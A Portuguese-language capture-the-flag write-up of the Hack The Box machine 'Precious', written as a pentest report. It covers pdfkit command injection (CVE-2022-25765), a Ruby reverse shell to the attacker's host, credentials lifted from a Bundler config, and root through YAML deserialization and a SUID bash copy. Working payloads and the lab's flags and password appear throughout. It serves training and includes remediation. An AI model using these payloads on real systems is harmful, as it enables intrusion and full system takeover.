Precious

https://app.hackthebox.com/machines/Precious

Summary

Precious é um alvo baseado em Linux que hospeda um utilitário de conversão de "Web para PDF" alimentado por Ruby on Rails. A avaliação identificou uma vulnerabilidade crítica de Injeção de Comando (CVE-2022-25765) na biblioteca subjacente pdfkit, permitindo a Execução Remota de Código (RCE) não autenticada.

A enumeração pós-exploração descobriu credenciais em texto claro armazenadas na configuração do Bundler de um usuário, facilitando a movimentação lateral via SSH. A escalação final de privilégios para root foi alcançada explorando uma falha de Desserialização Insegura em um script Ruby com permissões sudo que utilizava YAML.load em entradas não confiáveis.

MITRE Kill Chain

1

Reconnaissance

A enumeração de rede identificou um servidor web na porta TCP 80 e SSH na porta 22.

2

Resource Development

Um servidor HTTP local foi preparado para hospedar payloads maliciosos para a aplicação alvo recuperar.

3

Initial Access

Uma vulnerabilidade de Injeção de Comando no pdfkit v0.8.6 foi explorada via um parâmetro de URL modificado para executar código arbitrário.

4

Execution

Um reverse shell baseado em Ruby foi executado para estabelecer uma sessão interativa como o usuário ruby.

5

Credential Access

Credenciais em texto claro para um usuário secundário foram coletadas do arquivo .bundle/config.

6

Lateral Movement

As credenciais comprometidas foram usadas para autenticação via SSH como o usuário henry.

7

Privilege Escalation

Um script Ruby rodando com privilégios sudo foi explorado via Desserialização Insegura (YAML), resultando no comprometimento total como root.

---

Reconnaissance

#attack/T1018 #attack/T1595_001 #attack/T1592

Initial Connectivity & Host Discovery

A avaliação começou com uma verificação de conectividade com o host alvo. Uma solicitação de eco ICMP foi transmitida para verificar o status do ativo e estimar o sistema operacional subjacente.

attacker> ping -c 1 10.10.11.189
PING 10.10.11.189 (10.10.11.189) 56(84) bytes of data.
64 bytes from 10.10.11.189: icmp_seq=1 ttl=63 time=208 ms

--- 10.10.11.189 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 208.190/208.190/208.190/0.000 ms

O valor TTL (Time to Live) de 63 indica que o alvo é provavelmente um sistema baseado em Linux, considerando um salto único no trânsito.

Network Service Enumeration

Para mapear a superfície de ataque, uma varredura completa de portas TCP foi realizada utilizando o nmap. A varredura visou todas as 65.535 portas para identificar listeners abertos.

attacker> nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn -oG portsTCP.gnmap 10.10.11.189

Após a identificação das portas abertas, uma varredura de serviço direcionada foi executada para determinar informações de versão e a saída de scripts padrão para os serviços descobertos nas portas 22 e 80.

attacker> nmap -sCV -p22,80 -vvv -n -Pn -oX scanTCP.xml 10.10.11.189
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A enumeração de serviços revelou o seguinte:

• Port 22: Executando OpenSSH 8.4p1 no Debian Bullseye.

• Port 80: Executando nginx 1.18.0. O servidor web respondeu com um redirecionamento 302 Found para http://precious.htb/, indicando uma configuração baseada em virtual host.

Virtual Host Configuration

Para interagir com a aplicação web, o arquivo local /etc/hosts foi atualizado para mapear o endereço IP 10.10.11.189 para o domínio precious.htb.

attacker> grep "precious.htb" /etc/hosts
10.10.11.189    precious.htb

---

Web Exploitation

#attack/T1592 #attack/T1593

O perfilamento tecnológico inicial foi realizado em http://precious.htb para identificar a stack web subjacente e potenciais pontos de interesse.

attacker> whatweb http://precious.htb/ -v | tee whatweb.txt
WhatWeb report for http://precious.htb/
Status    : 200 OK
Title     : Convert Web Page to PDF
IP        : 10.10.11.189
Summary   : HTML5, HTTPServer[nginx/1.18.0 + Phusion Passenger(R) 6.0.15], nginx[1.18.0], Ruby-on-Rails, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-Powered-By[Phusion Passenger(R) 6.0.15], X-XSS-Protection[1; mode=block]
<SNIP>

O alvo é uma aplicação Ruby on Rails servida via Phusion Passenger 6.0.15 por trás de um Nginx 1.18.0.

A aplicação é um utilitário "Convert Web Page to PDF" rodando em Ruby-on-Rails e servido pelo Phusion Passenger 6.0.15. Uma busca por vulnerabilidades conhecidas no Phusion Passenger foi conduzida; no entanto, os resultados foram principalmente exploits legados para Windows e não se alinharam com o ambiente alvo.

attacker> searchsploit phusion
--------------------------------------------------------------- ---------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------
Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow           | windows/remote/21294.c
Phusion WebServer 1.0 - Directory Traversal (1)                | windows/remote/21291.pl
<SNIP>

Functional Analysis: PDF Conversion

A interface web apresenta um único campo de entrada solicitando uma URL para ser convertida em um documento PDF.

Para testar o comportamento da aplicação e verificar sua capacidade de alcançar recursos externos, um servidor HTTP local foi iniciado, e uma requisição foi iniciada a partir da interface web.

attacker> echo "Hello Haxor" > index.html
attacker> python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.189 - - [02/Dec/2022 21:21:29] "GET / HTTP/1.1" 200 -

A aplicação recuperou com sucesso o conteúdo do servidor controlado pelo atacante e renderizou um PDF.

Vulnerability Discovery: PDFKit Command Injection

#attack/T1190 #owasp/A05_2025 #owasp/A03_2025

A análise do PDF gerado foi realizada utilizando exiftool para identificar o mecanismo de processamento no backend.

attacker> exiftool jrtl2yok7ptc2fklhh8sa6rlrk6q423w.pdf
ExifTool Version Number         : 12.16
File Name                       : jrtl2yok7ptc2fklhh8sa6rlrk6q423w.pdf
<SNIP>
MIME Type                       : application/pdf
PDF Version                     : 1.4
Creator                         : Generated by pdfkit v0.8.6

A aplicação utiliza pdfkit v0.8.6 para a geração de documentos.

Pesquisas adicionais sobre esta versão revelaram a CVE-2022-25765, uma vulnerabilidade crítica de injeção de comando (command injection). A falha existe porque a biblioteca não higieniza adequadamente os parâmetros de URL. Se uma URL contiver uma query string com um comando shell codificado (por exemplo, usando crases ou $( )), o pdfkit executa o comando durante o processo de conversão.

Finding: Command Injection in pdfkit v0.8.6 (CVE-2022-25765)

• Affected Asset: http://precious.htb/ (Backend: Ruby pdfkit library)

• Severity: Critical

• Vulnerability Type: Unauthenticated Remote Code Execution (RCE)

Reproduction Steps:

1

Identifique o campo de entrada para conversão de URL.

2

Submeta um payload contendo um comando dentro de um parâmetro de consulta, como: http://<attacker-ip>/?name=#{'%20 sleep 5%'}

3

Observe a resposta atrasada ou execute um comando de reverse shell.

Remediation: Atualize a gem pdfkit para a versão 0.8.7 ou superior, que inclui a higienização adequada de parâmetros.

Exploit Verification

Uma prova de conceito foi executada para confirmar a vulnerabilidade tentando ecoar o usuário atual dentro do conteúdo do PDF. Ao passar o comando como um parâmetro de URL, o backend executou a instrução e incorporou a saída no documento resultante.

# Attacker sets up local environment
attacker> echo "echo $USER" > index.html
attacker> python3 -m http.server 80

# Application makes request to: http://10.10.14.X/?name=%20`whoami`
10.10.11.189 - - [02/Dec/2022 21:24:57] "GET /?name=%20`whoami` HTTP/1.1" 200 -

O PDF resultante confirmou a execução bem-sucedida, exibindo o nome de usuário ruby.

Remote Code Execution (RCE)

A vulnerabilidade no pdfkit v0.8.6 foi aproveitada para obter execução arbitrária de código. Ao injetar comandos shell nos parâmetros de URL passados para o gerador de PDF, o sistema subjacente executou os comandos sob o contexto do usuário ruby.

A validação inicial foi realizada executando os comandos id e hostname -I. O payload foi estruturado para satisfazer o requisito de URL enquanto escapava da lógica pretendida pela aplicação.

# Payload submitted to the web interface:
http://10.10.14.153/?name=%20`id; hostname -I`

O documento PDF resultante renderizou a saída dos comandos, confirmando o contexto de execução e a configuração de rede.

RCE confirmado: A aplicação está executando comandos como o usuário ruby (UID 1001).

Reverse Shell Establishment

Para obter uma sessão interativa, um payload de reverse shell baseado em Ruby foi criado. Um listener HTTP não foi necessário para o payload final; em vez disso, um listener Netcat foi preparado na máquina do atacante para interceptar a conexão de saída.

# Payload submitted to the web interface:
http://10.10.14.153/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.153",443))'`

O listener capturou a conexão com sucesso, fornecendo um shell remoto.

attacker> nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.11.189] 52480

whoami
ruby

hostname -I
10.10.11.189

Shell Stabilization

O shell inicial foi atualizado para um TTY totalmente interativo para suportar recursos avançados de terminal e controle de jobs.

ruby@precious:/var/www/pdfapp$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
ruby@precious:/var/www/pdfapp$ ^Z
[1]+  Stopped                 nc -nlvp 443

attacker> stty raw -echo; fg
nc -nlvp 443
            reset xterm

ruby@precious:/var/www/pdfapp$ export TERM=xterm SHELL=bash
ruby@precious:/var/www/pdfapp$ stty rows 53 columns 129

---

Lateral Movement

#attack/T1552_001 #attack/T1021_004

Internal Enumeration

Após o estabelecimento do acesso inicial, o sistema foi enumerado em busca de arquivos sensíveis e contas de usuário adicionais.

ruby@precious:~$ grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
henry:x:1000:1000:henry,,,:/home/henry:/bin/bash
ruby:x:1001:1001::/home/ruby:/bin/bash

A enumeração identificou um usuário secundário, henry. A investigação do diretório home do usuário ruby revelou um diretório oculto .bundle contendo um arquivo de configuração.

ruby@precious:~$ ls -la /home/ruby/
total 28
drwxr-xr-x 4 ruby ruby 4096 Dec  2 21:11 .
drwxr-xr-x 4 root root 4096 Oct 26 08:04 ..
lr--r--r-- 1 root root    9 Oct 26 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
drwxr-xr-x 2 ruby ruby 4096 Dec  2 21:20 .bundle
drwxr-xr-x 3 ruby ruby 4096 Dec  2 21:11 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile

ruby@precious:~$ cat /home/ruby/.bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Credenciais em texto claro para o usuário henry foram descobertas dentro do arquivo de configuração do Bundler.

As credenciais descobertas foram utilizadas para autenticar como henry via SSH, garantindo acesso mais persistente e acesso aos dados do usuário.

attacker> ssh henry@precious.htb
henry@precious.htb's password: [Q3c1AqGHtoI0aXAYFH]
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
<SNIP>
henry@precious:~$ id
uid=1000(henry) gid=1000(henry) groups=1000(henry)

Após o login bem-sucedido, a flag de usuário foi recuperada do diretório home.

henry@precious:~$ cat user.txt 
e06555f977145a1180ad10b3d0fc27c8

---

Privilege Escalation

#attack/T1548_003 #attack/T1210 #owasp/A08_2025

Sudo Rights Enumeration

O usuário henry foi encontrado com privilégios sudo específicos que permitiam a execução de um script Ruby como o usuário root sem fornecer uma senha.

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

O script alvo, /opt/update_dependencies.rb, pertence ao root e não pode ser escrito pelo usuário atual.

henry@precious:~$ ls -la /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25 11:02 /opt/update_dependencies.rb

Vulnerability Analysis: Insecure Deserialization

A análise do código-fonte Ruby revelou uma falha de segurança crítica na maneira como o script lida com arquivos de configuração externos.

henry@precious:~$ cat /opt/update_dependencies.rb
<SNIP>
def list_from_file
    YAML.load(File.read("dependencies.yml"))
end
</SNIP>

O script utiliza o método YAML.load para processar um arquivo chamado dependencies.yml. Como o script usa um caminho relativo e o método inseguro load (ao contrário de safe_load), um atacante pode controlar o fluxo de execução colocando um arquivo YAML malicioso no diretório de trabalho atual.

Finding: Insecure Deserialization in update_dependencies.rb

• Affected Asset: /opt/update_dependencies.rb

• Severity: Critical

• Vulnerability Type: Insecure Deserialization (Ruby YAML)

Reproduction Steps:

1

Crie um arquivo chamado dependencies.yml em um diretório gravável.

2

Incorpore um payload de objeto Ruby serializado projetado para acionar a execução de Kernel.system.

3

Execute o script com sudo a partir desse diretório: sudo /usr/bin/ruby /opt/update_dependencies.rb.

Remediation: Substitua YAML.load por YAML.safe_load e garanta que o script referencie arquivos de configuração usando caminhos absolutos.

Vulnerability Verification (PoC)

Para verificar a vulnerabilidade, um dependencies.yml malicioso foi criado usando uma conhecida gadget chain de desserialização Ruby YAML. O primeiro teste visou executar o comando id como root.

henry@precious:/tmp/exploit$ ls
dependencies.yml

henry@precious:/tmp/exploit$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
<SNIP>

A saída confirmou que o comando foi executado com sucesso com privilégios de root.

Root Access Acquisition

O payload foi modificado para estabelecer um ponto de acesso persistente de nível root. Especificamente, o binário bash foi copiado para o diretório /tmp e recebeu permissões SUID.

# dependencies.yml payload snippet
# <SNIP>
             git_set: cp /bin/bash /tmp/brunobash; chmod 4777 /tmp/brunobash
         method_id: :resolve

Executar o script novamente acionou o payload:

henry@precious:/tmp/exploit$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
<SNIP>

henry@precious:/tmp/exploit$ ls -la /tmp/brunobash
-rwsrwxrwx  1 root  root  1234376 Dec 19 23:05 /tmp/brunobash

Ao executar o binário bash SUID com a flag -p (preservar permissões), um shell root foi obtido.

henry@precious:/tmp/exploit$ /tmp/brunobash -p
brunobash-5.1# whoami
root

brunobash-5.1# cat /root/root.txt 
e202b3ffe79fc3b635b364bb9ab87ced

Escalação de privilégios bem-sucedida. Comprometimento total do sistema alcançado.